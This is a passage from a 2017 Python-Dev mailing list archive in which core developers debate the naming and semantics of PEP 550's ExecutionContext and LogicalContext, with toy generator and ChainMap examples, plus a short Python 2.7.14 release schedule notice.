dynamic context that ContextKey.get() queries > > Right now, we're using ExecutionContext for the latter, and > LogicalContext for the former, and I can definitely see Antoine's > point that those names don't inherently convey any information about > which is which. > [snip] > # Replacing ExecutionContext in the current PEP > DynamicQueryContext > sys.get_dynamic_query_context() > sys.new_dynamic_query_context() > sys.run_with_dynamic_query_context() > # Suggests immutability -> good! > # Suggests connection to ck.get() -> good! > > # Replacing LogicalContext in the current PEP > ExecutionContext > sys.new_execution_context() > sys.run_with_execution_context() > __execution_context__ attribute on generators (et al) > # Neutral on mutability/immutability > # Neutral on ck.set()/ck.get() >[snippety snip] > # Replacing ExecutionContext in the current PEP > DynamicQueryContext > sys.get_query_context() > sys.new_query_context() > sys.run_with_query_context() > # Suggests immutability -> good! > # Suggests connection to ck.get() -> good! 
> > # Replacing LogicalContext in the current PEP > DynamicWriteContext > sys.new_write_context() > sys.run_with_write_context() > __write_context__ attribute on generators (et al) > # Suggests mutability -> good! > # Suggests connection to ck.set() -> good! This is just getting more confusing for me. Going back to Yury's original names for now... Relating this naming problem back to globals() and locals(), the correlation works okay for locals/LocalContext, but breaks down at the globals() level because globals() is a specific set of variables -- namely, module-level assignments, while ExecutionContext would be the equivalent of globals, nonlocals, and locals all together. A more accurate name for ExecutionContext might be ParentContext, but that would imply that the LocalContext is not included, and it is (if I finally understand what's going on, of course). So I like ExecutionContext for the stack of WhateverWeCallTheOtherContext contexts. But what do we call it? Again, if I understand what's going on, a normal, threadless, non-async, generator-bereft, plain vanilla Python program is going to have only one LocalContext no matter how many nor how deep the function call chain goes -- so in that sense Local isn't really the best word, but Context all by itself is /really/ unhelpful, and Local does imply "the most current Context Layer". Of all the names proposed so far, I think LocalContext is the best reminder of the thing that CK.key writes to. For the piled layers of LocalContexts that CK.key.get searches through, either ExecutionContext or perhaps ContextEnvironment or even ContextStack works for me (the stack portion not being an implementation detail, but a promise of how it effectively works). -- ~Ethan~ From solipsis at pitrou.net Sun Aug 20 06:07:11 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Sun, 20 Aug 2017 12:07:11 +0200 Subject: [Python-Dev] PEP 550 v3 References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> Message-ID: <20170820120711.3e876391@fsol> On Sat, 19 Aug 2017 17:21:03 -0700 Guido van Rossum wrote: > The way we came to "logical context" was via "logical thread (of control)", > which is distinct from OS thread. But I think we might need to search for > another term... Perhaps "task context"? A "task" might be a logical thread, OS thread, or anything else that deserves a distinct set of implicit parameters. Regards Antoine. From francismb at email.de Sun Aug 20 06:39:00 2017 From: francismb at email.de (francismb) Date: Sun, 20 Aug 2017 12:39:00 +0200 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: Message-ID: <7cdb32ce-b609-a22c-ec82-1ced1f80e504@email.de> Hi Yury, On 08/18/2017 10:33 PM, Yury Selivanov wrote: > * ``.get()`` method: return the current EC value for the context key. > Context keys return ``None`` when the key is missing, so the method > never fails. Is the difference between `Key not found` and `value is None` important here? Thanks, --francis From benjamin at python.org Sun Aug 20 15:03:45 2017 From: benjamin at python.org (Benjamin Peterson) Date: Sun, 20 Aug 2017 12:03:45 -0700 Subject: [Python-Dev] 2.7.14 schedule Message-ID: <1503255825.3985080.1079284200.1E2B25D5@webmail.messagingengine.com> Hi all, I've set the 2.7.14 release schedule. There will be a release candidate on August 26 with a planned final for September 16. 
From brett at python.org  Sun Aug 20 22:04:34 2017
From: brett at python.org (Brett Cannon)
Date: Mon, 21 Aug 2017 02:04:34 +0000
Subject: [Python-Dev] PEP 550 v3
In-Reply-To: <20170820120711.3e876391@fsol>
References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us>
 <20170820120711.3e876391@fsol>
Message-ID:

On Sun, Aug 20, 2017, 03:08 Antoine Pitrou wrote:

> On Sat, 19 Aug 2017 17:21:03 -0700
> Guido van Rossum wrote:
> > The way we came to "logical context" was via "logical thread (of
> > control)", which is distinct from OS thread. But I think we might
> > need to search for another term...
>
> Perhaps "task context"?  A "task" might be a logical thread, OS
> thread, or anything else that deserves a distinct set of implicit
> parameters.

Maybe this is skirting too close to dynamic scoping, but maybe
ContextFrame?  This does start to line up with frames of execution,
which I know is a bit low-level, but then again most people will never
need to know about this corner of Python.

-brett

From guido at python.org  Mon Aug 21 01:03:20 2017
From: guido at python.org (Guido van Rossum)
Date: Sun, 20 Aug 2017 22:03:20 -0700
Subject: [Python-Dev] PEP 550 v3
In-Reply-To:
References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us>
 <20170820120711.3e876391@fsol>
Message-ID:

> On Sun, Aug 20, 2017, 03:08 Antoine Pitrou wrote:
>
>> Perhaps "task context"?  A "task" might be a logical thread, OS
>> thread, or anything else that deserves a distinct set of implicit
>> parameters.

I think you're on to something here, though I hesitate to use "task"
because asyncio.Task is a specific implementation of it.

On Sun, Aug 20, 2017 at 7:04 PM, Brett Cannon wrote:

> Maybe this is skirting too close to dynamic scoping, but maybe
> ContextFrame?  This does start to line up with frames of execution,
> which I know is a bit low-level, but then again most people will
> never need to know about this corner of Python.

I've been thinking that the missing link here may be the execution
stack.  A logical thread (LT) has a "logical stack" (LS).  While a
thread of control is a fairly fuzzy concept (once you include things
that aren't OS threads), an execution stack is a concrete object, even
if not all logical threads represent their execution stack in the same
way.  For example, a suspended asyncio Task has a stack that is
represented by a series of stack frames linked together by await (or
yield from), and greenlet apparently uses a different representation
again (their term is micro-thread -- maybe we could also do something
with that?).

Here's the result of some more thinking about this PEP that I've been
doing while writing and rewriting this message (with a surprising
ending).

Let's say that the details of scheduling an LT and managing its
mapping onto an LS is defined by a "framework".  In this terminology,
OS threads are a framework, as are generators, asyncio, and greenlet.
There are potentially many different such frameworks.  (Some others
include Twisted, Tornado and concurrent.futures.ThreadPoolExecutor.)

The PEP's big idea is to recognize that there are also many different,
non-framework, libraries (e.g. Decimal or Flask) that need to
associate some data with an LT.  The PEP therefore proposes APIs that
allow libraries to do this without caring about what framework is
managing the LT, and vice versa (the framework doesn't have to care
about how libraries use the per-LT data).

The proposed APIs use two sets of concepts: one set for the framework
and one for the library.

The library-facing API is simple: create a ContextKey (CK) instance as
a global variable in the library, and use its get() and set() methods
to access and manipulate the data for that library associated with the
current logical thread (LT).  Its role is similar to
threading.local(), although the API and implementation are completely
different, and threading.local() is tied to a specific framework (OS
threads).

For frameworks the API is more complicated.  There are two new
classes, LogicalContext (LC) and ExecutionContext (EC).  The PEP gives
pseudo code suggesting that LC is/contains a dict (whose items are
(CK, value) pairs) and an EC is/contains a list of LCs.  But in
actuality that's only one possible implementation (and not the one
proposed for CPython).

The key idea is rather that a framework needs to be able to take the
data associated with one LT and clone it as the starting point for the
data associated with a new LT.  This cloning is done by
sys.get_execution_context(), and the PEP proposes to use a Hash Array
Mapped Trie (HAMT) as the basis for the implementation of LC and EC,
to make this cloning fast.  IIUC it needs to be fast to match the
speed with which many frameworks create and destroy their LTs.

The PEP proposes a bunch of new functions in sys for frameworks to
manipulate LCs and ECs and their association with the current OS-level
thread.  Note that OS threads are important here because in the end
all frameworks build on top of them.

Honestly I'm not sure we need the distinction between LC and EC.  If
you read carefully some of the given example code seems to confuse
them.  If we could get away with only a single framework-facing
concept, I would be happy calling it ExecutionContext.

(Another critique of the proposal I have is that it adds too many
similarly-named functions to sys.  But this email is already too long
and I need to go to bed.)

-- 
--Guido van Rossum (python.org/~guido)

From jimjjewett at gmail.com  Mon Aug 21 01:45:05 2017
From: jimjjewett at gmail.com (Jim J. Jewett)
Date: Mon, 21 Aug 2017 01:45:05 -0400
Subject: [Python-Dev] PEP 550 v3 naming
Message-ID:

Building on Brett's suggestion:

FrameContext: used in/writable by one frame
ContextStack: a FrameContext and its various fallbacks

-jJ

From solipsis at pitrou.net  Mon Aug 21 07:43:48 2017
From: solipsis at pitrou.net (Antoine Pitrou)
Date: Mon, 21 Aug 2017 13:43:48 +0200
Subject: [Python-Dev] PEP 550 v3 naming
References:
Message-ID: <20170821134348.155d17a1@fsol>

On Mon, 21 Aug 2017 01:45:05 -0400
"Jim J. Jewett" wrote:
> Building on Brett's suggestion:
>
> FrameContext: used in/writable by one frame

It's not frame-specific, it's actually shared by an arbitrary number
of frames (by default, all frames in a given thread).

Regards

Antoine.
From ncoghlan at gmail.com  Mon Aug 21 10:12:04 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Tue, 22 Aug 2017 00:12:04 +1000
Subject: [Python-Dev] PEP 550 v3
In-Reply-To:
References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us>
 <20170820120711.3e876391@fsol>
Message-ID:

On 21 August 2017 at 15:03, Guido van Rossum wrote:
> Honestly I'm not sure we need the distinction between LC and EC. If you read
> carefully some of the given example code seems to confuse them. If we could
> get away with only a single framework-facing concept, I would be happy
> calling it ExecutionContext.

Unfortunately, I don't think we can, and that's why I tried to reframe
the discussion in terms of "Where ContextKey.set() writes to" and
"Where ContextKey.get() looks things up".

Consider the following toy generator:

    def tracking_gen():
        start_tracking_iterations()
        while True:
            tally_iteration()
            yield

    task_id = ContextKey("task_id")
    iter_counter = ContextKey("iter_counter")

    def start_tracking_iterations():
        iter_counter.set(collections.Counter())

    def tally_iteration():
        current_task = task_id.get()  # Set elsewhere
        iter_counter.get()[current_task] += 1

Now, this isn't a very *sensible* generator (since it could just use a
regular object instance for tracking instead of a context variable),
but nevertheless, it's one that we would expect to work, and it's one
that we would expect to exhibit the following properties:

1. When tally_iteration() calls task_id.get(), we expect that to be
resolved in the context calling next() on the instance, *not* the
context where the generator was first created
2. When tally_iteration() calls iter_counter.get(), we expect that to
be resolved in the same context where start_tracking_iterations()
called iter_counter.set()

This has consequences for the design in the PEP:

* what we want to capture at generator creation time is the context
where writes will happen, and we also want that to be the innermost
context used for lookups
* other than that innermost context, we want everything else to be dynamic
* this means that "mutable context saved on the generator" and "entire
dynamic context visible when the generator runs" aren't the same thing

And hence the introduction of the LocalContext/LogicalContext
terminology for the former, and the ExecutionContext terminology for
the latter.

It's also where the analogy with ChainMap came from (although I don't
think this has made it into the PEP itself):

* LogicalContext is the equivalent of the individual mappings
* ExecutionContext is the equivalent of ChainMap
* ContextKey.get() replaces ChainMap.__getitem__
* ContextKey.set(value) replaces ChainMap.__setitem__
* ContextKey.set(None) replaces ChainMap.__delitem__

While the context is defined conceptually as a nested chain of
key:value mappings, we avoid using the mapping syntax because of the
way the values can shift dynamically out from under you based on who
called you - while the ChainMap analogy is hopefully helpful to
understanding, we don't want people taking it too literally or things
will become more confusing rather than less.
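To make the analogy concrete, here's a quick ChainMap rendering of it
(purely illustrative - the real proposal never exposes a mapping
interface, and the names here are just placeholders):

    from collections import ChainMap

    ec = ChainMap()                   # ExecutionContext: chain of LCs
    ec['ck'] = 'outer'                # ck.set() writes to the first mapping

    gen_lc = {}                       # a generator's LogicalContext
    ec_in_gen = ec.new_child(gen_lc)  # pushed while the generator runs

    ec_in_gen['ck'] = 'inner'         # ck.set() inside the generator
    print(ec_in_gen['ck'])            # inner - innermost LC wins on lookup
    print(ec['ck'])                   # outer - unaffected once the LC pops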
Despite that risk, taking the analogy further is where the DynamicWriteContext + DynamicLookupContext terminology idea came from: * like ChainMap.new_child(), adjusting the DynamicWriteContext changes what ck.set() affects, and also sets the innermost context for ck.get() * like using a different ChainMap, adjusting the DynamicLookupContext changes what ck.get() can see (unlike ChainMap, it also isolates ck.set() by default) I'll also note that the first iteration of the PEP didn't really make this distinction, and it caused a problem that Nathaniel pointed out: generators would "snapshot" their entire dynamic context when first created, and then never adjust it for external changes between iterations. This meant that if you adjusted something like the decimal context outside the generator after creating it, it would ignore those changes - instead of having the problem of changes inside the generator leaking out, we instead had the problem of changes outside the generator *not* making their way in, even if you wanted them to. Due to that heritage, fixing some of the examples could easily have been missed in the v2 rewrite that introduced the distinction between the two kinds of context. > (Another critique of the proposal I have is that it adds too many > similarly-named functions to sys. But this email is already too long and I > need to go to bed.) If it helps any, one of the ideas that has come up is to put all of the proposed context manipulation APIs in contextlib rather than in sys, and I think that's a reasonable idea (I don't think any of us actually like the notion of adding that many new subsystem specific APIs directly to sys). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ethan at stoneleaf.us Mon Aug 21 12:37:29 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Mon, 21 Aug 2017 09:37:29 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <20170821134348.155d17a1@fsol> References: <20170821134348.155d17a1@fsol> Message-ID: <599B0C49.404@stoneleaf.us> On 08/21/2017 04:43 AM, Antoine Pitrou wrote: > On Mon, 21 Aug 2017 01:45:05 -0400 > "Jim J. Jewett" wrote: >> Building on Brett's suggestion: >> >> FrameContext: used in/writable by one frame > > It's not frame-specific, it's actually shared by an arbitrary number of > frames (by default, all frames in a given thread). You're thinking too specifically. A FrameContext/LogicalContext/LocalContext/etc is just a larger frame; although I would go with ExecutionContext/ContextFrame, myself. -- ~Ethan~ From yselivanov.ml at gmail.com Mon Aug 21 13:17:15 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 13:17:15 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599B0C49.404@stoneleaf.us> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> Message-ID: -1 on using "frame" in PEP 550 terminology. Antoine is right, the API is not frame-specific, and "frame" in Python has only one meaning. I can certainly see how "ContextFrame" can be correct if we think about "frame" as a generic term, but in Python, people will inadvertently think about a connection with frame objects/stacks. 
Yury From guido at python.org Mon Aug 21 15:10:06 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 21 Aug 2017 12:10:06 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 7:12 AM, Nick Coghlan wrote: > On 21 August 2017 at 15:03, Guido van Rossum wrote: > > Honestly I'm not sure we need the distinction between LC and EC. If you > read > > carefully some of the given example code seems to confuse them. If we > could > > get away with only a single framework-facing concept, I would be happy > > calling it ExecutionContext. > > Unfortunately, I don't think we can, and that's why I tried to reframe > the discussion in terms of "Where ContextKey.set() writes to" and > "Where ContextKey.get() looks things up". > > Consider the following toy generator: > > def tracking_gen(): > start_tracking_iterations() > while True: > tally_iteration() > yield > > task_id = ContextKey("task_id") > iter_counter = ContextKey("iter_counter") > > def start_tracking_iterations(): > iter_counter.set(collections.Counter()) > > def tally_iteration(): > current_task = task_id.get() # Set elsewhere > iter_counter.get()[current_task] += 1 > > Now, this isn't a very *sensible* generator (since it could just use a > regular object instance for tracking instead of a context variable), > but nevertheless, it's one that we would expect to work, and it's one > that we would expect to exhibit the following properties: > > 1. When tally_iteration() calls task_id.get(), we expect that to be > resolved in the context calling next() on the instance, *not* the > context where the generator was first created > 2. When tally_iteration() calls iter_counter.get(), we expect that to > be resolved in the same context where start_tracking_iterations() > called iter_counter.set() > > This has consequences for the design in the PEP: > > * what we want to capture at generator creation time is the context > where writes will happen, and we also want that to be the innermost > context used for lookups > * other than that innermost context, we want everything else to be dynamic > * this means that "mutable context saved on the generator" and "entire > dynamic context visible when the generator runs" aren't the same thing > > And hence the introduction of the LocalContext/LogicalContext > terminology for the former, and the ExecutionContext terminology for > the latter. > OK, this is a sensible explanation. I think the PEP would benefit from including some version of it early on (though perhaps shortened a bit). > It's also where the analogy with ChainMap came from (although I don't > think this has made it into the PEP itself): > > * LogicalContext is the equivalent of the individual mappings > * ExecutionContext is the equivalent of ChainMap > * ContextKey.get() replaces ChainMap.__getitem__ > * ContextKey.set(value) replaces ChainMap.__setitem__ > * ContextKey.set(None) replaces ChainMap.__delitem__ > > While the context is defined conceptually as a nested chain of > key:value mappings, we avoid using the mapping syntax because of the > way the values can shift dynamically out from under you based on who > called you - while the ChainMap analogy is hopefully helpful to > understanding, we don't want people taking it too literally or things > will become more confusing rather than less. > Agreed. However now I am confused as to how the HAMT fits in.
Yury says somewhere that the HAMT will be used for the EC and then cloning the EC is just returning a pointer to the same EC. But even if I interpret that as making a new EC containing a pointer to the same underlying HAMT, I don't see how that will preserve the semantics that different logical threads, running interleaved (like different generators being pumped alternatingly), will see updates to LCs that are lower on the stack of LCs in the EC. (I see this with the stack-of-dicts version, but not with the immutable HAMT implementation.) > Despite that risk, taking the analogy further is where the > DynamicWriteContext + DynamicLookupContext terminology idea came from: > > * like ChainMap.new_child(), adjusting the DynamicWriteContext changes > what ck.set() affects, and also sets the innermost context for > ck.get() > * like using a different ChainMap, adjusting the DynamicLookupContext > changes what ck.get() can see (unlike ChainMap, it also isolates > ck.set() by default) > Here I'm lost again. In the PEP's pseudo code, your first bullet seems to be the operation "push a new LC on the stack of the current EC". Does the second bullet just mean "switch to a different EC"? > I'll also note that the first iteration of the PEP didn't really make > this distinction, and it caused a problem that Nathaniel pointed out: > generators would "snapshot" their entire dynamic context when first > created, and then never adjust it for external changes between > iterations. This meant that if you adjusted something like the decimal > context outside the generator after creating it, it would ignore those > changes - instead of having the problem of changes inside the > generator leaking out, we instead had the problem of changes outside > the generator *not* making their way in, even if you wanted them to. > OK, this really needs to be made very clear early in the PEP. Maybe this final sentence provides the key requirement: changes outside the generator should make it into the generator when next() is invoked, unless the generator itself has made an override; but changes inside the generator should not leak out through next(). > Due to that heritage, fixing some of the examples could easily have > been missed in the v2 rewrite that introduced the distinction between > the two kinds of context. > At this point I would like to suggest that maybe you and/or Nathaniel could volunteer as co-authors for the PEP. You could then also help Yury clean up his grammar (e.g. adding "the" in various places) and improve the general structure of the PEP. > > (Another critique of the proposal I have is that it adds too many > > similarly-named functions to sys. But this email is already too long and > I > > need to go to bed.) > > If it helps any, one of the ideas that has come up is to put all of > the proposed context manipulation APIs in contextlib rather than in > sys, and I think that's a reasonable idea (I don't think any of us > actually like the notion of adding that many new subsystem specific > APIs directly to sys). > I don't think it belongs in contextlib. That module is about contexts for use in with-statements; here we are not particularly concerned with those but with manipulating state that is associated with a logical thread. I think it makes more sense to add a new module for this purpose. I also think that some of the framework-facing APIs should probably be methods rather than functions.
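Expressed in code, that key requirement would look like this under the PEP's proposed ContextKey API (the key name and values are invented; this is expected-semantics pseudo-code rather than something runnable today):

    prec = ContextKey("precision")

    def g():
        yield prec.get()    # re-resolved at each next(), in the caller's context
        yield prec.get()
        prec.set(4)         # this write lands in the generator's own LC
        yield prec.get()

    prec.set(2)
    gen = g()
    assert next(gen) == 2   # value set before the first next() is visible
    prec.set(3)
    assert next(gen) == 3   # external change between iterations makes it in
    assert next(gen) == 4   # the generator's own override wins inside...
    assert prec.get() == 3  # ...but does not leak out through next()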
-- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 15:50:04 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 15:50:04 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 3:10 PM, Guido van Rossum wrote: [..] > Agreed. However now I am confused as to how the HAMT fits in. Yury says > somewhere that the HAMT will be used for the EC and then cloning the EC is > just returning a pointer to the same EC. But even if I interpret that as > making a new EC containing a pointer to the same underlying HAMT, I don't > see how that will preserve the semantics that different logical threads, > running interleaved (like different generators being pumped alternatingly), > will see updates to LCs that are lower on the stack of LCs in the EC. (I see > this with the stack-of-dicts version, but not with the immutable HAMT > inplementation.) Few important things (using the current PEP 550 terminology): * ExecutionContext is a *dynamic* stack of LogicalContexts. * LCs do not reference other LCs. * ContextKey.set() can only modify the *top* LC in the stack. If LC is a mutable mapping: # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] a.set(c) # LC4 = EC.top() # LC4[a] = c # EC = [LC1, LC2, LC3, LC4({a: c, foo: bar})] If LC are implemented with immutable mappings: # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] a.set(c) # LC4 = EC.pop() # LC4_1 = LC4.copy() # LC4_1[a] = c # EC.push(LC4_1) # EC = [LC1, LC2, LC3, LC4_1({a: c, foo: bar})] Any code that uses EC will not see any difference, because it can only work with the top LC. Back to generators. Generators have their own empty LCs when created to store their *local* EC modifications. When a generator is *being* iterated, it pushes its LC to the EC. When the iteration step is finished, it pops its LC from the EC. If you have nested generators, they will dynamically build a stack of their LCs while they are iterated. Therefore, generators *naturally* control the stack of EC. We can't execute two generators simultaneously in one thread (we can only iterate them one by one), so the top LC always belongs to the current generator that is being iterated: def nested_gen(): # EC = [outer_LC, gen1_LC, nested_gen_LC] yield # EC = [outer_LC, gen1_LC, nested_gen_LC] yield def gen1(): # EC = [outer_LC, gen1_LC] n = nested_gen() yield # EC = [outer_LC, gen1_LC] next(n) # EC = [outer_LC, gen1_LC] yield next(n) # EC = [outer_LC, gen1_LC] def gen2(): # EC = [outer_LC, gen2_LC] yield # EC = [outer_LC, gen2_LC] yield g1 = gen1() g2 = gen2() next(g1) next(g2) next(g1) next(g2) HAMT is a way to efficiently implement immutable mappings with O(log32 N) set operation, that's it. If we implement immutable mappings using regular dicts and copy, set() would be O(log N). [..] >> >> I'll also note that the first iteration of the PEP didn't really make >> this distinction, and it caused a problem that Nathaniel pointed out: >> generators would "snapshot" their entire dynamic context when first >> created, and then never adjust it for external changes between >> iterations. 
This meant that if you adjusted something like the decimal >> context outside the generator after creating it, it would ignore those >> changes - instead of having the problem of changes inside the >> generator leaking out, we instead had the problem of changes outside >> the generator *not* making their way in, even if you wanted them to. > > > OK, this really needs to be made very clear early in the PEP. Maybe this > final sentence provides the key requirement: changes outside the generator > should make it into the generator when next() is invoked, unless the > generator itself has made an override; but changes inside the generator > should not leak out through next(). It's covered here with two examples: https://www.python.org/dev/peps/pep-0550/#ec-semantics-for-generators Yury From yselivanov.ml at gmail.com Mon Aug 21 15:53:02 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 15:53:02 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: Message-ID: On Sat, Aug 19, 2017 at 4:17 AM, Nick Coghlan wrote: [..] >> >> * Generator's ``.send()`` and ``.throw()`` methods are modified as >> follows (in pseudo-C):: >> >> if gen.__logical_context__ is not NULL: >> tstate = PyThreadState_Get() >> >> tstate.execution_context.push(gen.__logical_context__) >> >> try: >> # Perform the actual `Generator.send()` or >> # `Generator.throw()` call. >> return gen.send(...) >> finally: >> gen.__logical_context__ = tstate.execution_context.pop() >> else: >> # Perform the actual `Generator.send()` or >> # `Generator.throw()` call. >> return gen.send(...) > > I think this pseudo-code expansion includes a few holdovers from the > original visibly-immutable API design. > > Given the changes since then, I think this would be clearer if the > first branch used sys.run_with_logical_context(), since the logical > context references at the Python layer now behave like shared mutable > objects, and the apparent immutability of > sys.run_with_execution_context() comes from injecting a fresh logical > context every time. This is a good idea, I like it! It will indeed simplify the explanation. Yury From k7hoven at gmail.com Mon Aug 21 17:14:46 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Tue, 22 Aug 2017 00:14:46 +0300 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 5:12 PM, Nick Coghlan wrote: > On 21 August 2017 at 15:03, Guido van Rossum wrote: > > Honestly I'm not sure we need the distinction between LC and EC. If you > read > > carefully some of the given example code seems to confuse them. If we > could > > get away with only a single framework-facing concept, I would be happy > > calling it ExecutionContext. > > Unfortunately, I don't think we can, and that's why I tried to reframe > the discussion in terms of "Where ContextKey.set() writes to" and > "Where ContextKey.get() looks things up". 
> > Consider the following toy generator: > > def tracking_gen(): > start_tracking_iterations() > while True: > tally_iteration() > yield > > task_id = ContextKey("task_id") > iter_counter = ContextKey("iter_counter") > > def start_tracking_iterations(): > iter_counter.set(collections.Counter()) > > def tally_iteration(): > current_task = task_id.get() # Set elsewhere > iter_counter.get()[current_task] += 1 > > Now, this isn't a very *sensible* generator (since it could just use a > regular object instance for tracking instead of a context variable), > but nevertheless, it's one that we would expect to work, and it's one > that we would expect to exhibit the following properties: > > 1. When tally_iteration() calls task_id.get(), we expect that to be > resolved in the context calling next() on the instance, *not* the > context where the generator was first created > 2. When tally_iteration() calls iter_counter.get(), we expect that to > be resolved in the same context where start_tracking_iterations() > called iter_counter.set() > > This has consequences for the design in the PEP: > > * what we want to capture at generator creation time is the context > where writes will happen, and we also want that to be the innermost > context used for lookups > I don't get it. How is this a consequence of the above two points? And why do we need to capture something (a "context") at generator creation time? -- Koos > * other than that innermost context, we want everything else to be dynamic > * this means that "mutable context saved on the generator" and "entire > dynamic context visible when the generator runs" aren't the same thing > > And hence the introduction of the LocalContext/LogicalContext > terminology for the former, and the ExecutionContext terminology for > the latter. > > > [...] -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 17:25:10 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 17:25:10 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 5:14 PM, Koos Zevenhoven wrote: [..] >> This has consequences for the design in the PEP: >> >> * what we want to capture at generator creation time is the context >> where writes will happen, and we also want that to be the innermost >> context used for lookups > > > I don't get it. How is this a consequence of the above two points? And why > do we need to capture something (a "context") at generator creation time? > We don't need to "capture" anything when a generator is created (it was something that PEP 550 version 1 was doing). In the current version of the PEP, generators are initialized with an empty LogicalContext. When they are being iterated (started or resumed), their LogicalContext is pushed to the EC. When the iteration is stopped (or paused), they pop their LC from the EC. Yury From k7hoven at gmail.com Mon Aug 21 17:39:00 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Tue, 22 Aug 2017 00:39:00 +0300 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Tue, Aug 22, 2017 at 12:25 AM, Yury Selivanov wrote: > On Mon, Aug 21, 2017 at 5:14 PM, Koos Zevenhoven > wrote: > [..]
> >> This has consequences for the design in the PEP: > >> > >> * what we want to capture at generator creation time is the context > >> where writes will happen, and we also want that to be the innermost > >> context used for lookups > > > > > > I don't get it. How is this a consequence of the above two points? And > why > > do we need to capture something (a "context") at generator creation time? > > > > We don't need to "capture" anything when a generator is created (it > was something that PEP 550 version 1 was doing). > > Ok, good. > In the current version of the PEP, generators are initialized with an > empty LogicalContext. When they are being iterated (started or > resumed), their LogicalContext is pushed to the EC. When the > iteration is stopped (or paused), they pop their LC from the EC. > > Another quick one before I go: Do we really need to push and pop a LC on each next() call, even if it most likely will never be touched? -- Koos -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 17:44:53 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 17:44:53 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 5:39 PM, Koos Zevenhoven wrote: [..] >> In the current version of the PEP, generators are initialized with an >> empty LogicalContext. When they are being iterated (started or >> resumed), their LogicalContext is pushed to the EC. When the >> iteration is stopped (or paused), they pop their LC from the EC. >> > > Another quick one before I go: Do we really need to push and pop a LC on > each next() call, even if it most likely will never be touched? Yes, otherwise it will be hard to maintain the consistency of the stack. There will be an optimization: if the LC is empty, we will push NULL to the stack, thus avoiding the cost of allocating an object. I measured the overhead -- generators will become 0.5-1% slower in microbenchmarks, but only when they do pretty much nothing. If a generator contains more Python code than a bare "yield" expression, the overhead will be harder to detect. Yury From greg.ewing at canterbury.ac.nz Mon Aug 21 20:02:07 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Tue, 22 Aug 2017 12:02:07 +1200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> Message-ID: <599B747F.1050208@canterbury.ac.nz> Yury Selivanov wrote: > I can certainly see how "ContextFrame" can be correct if we think > about "frame" as a generic term, but in Python, people will > inadvertently think about a connection with frame objects/stacks. Calling it ExecutionContextFrame rather than just ContextFrame would make it clear that it relates to ExecutionContexts in particular. -- Greg From guido at python.org Mon Aug 21 20:06:11 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 21 Aug 2017 17:06:11 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 12:50 PM, Yury Selivanov wrote: > Few important things (using the current PEP 550 terminology): > > * ExecutionContext is a *dynamic* stack of LogicalContexts. > * LCs do not reference other LCs.
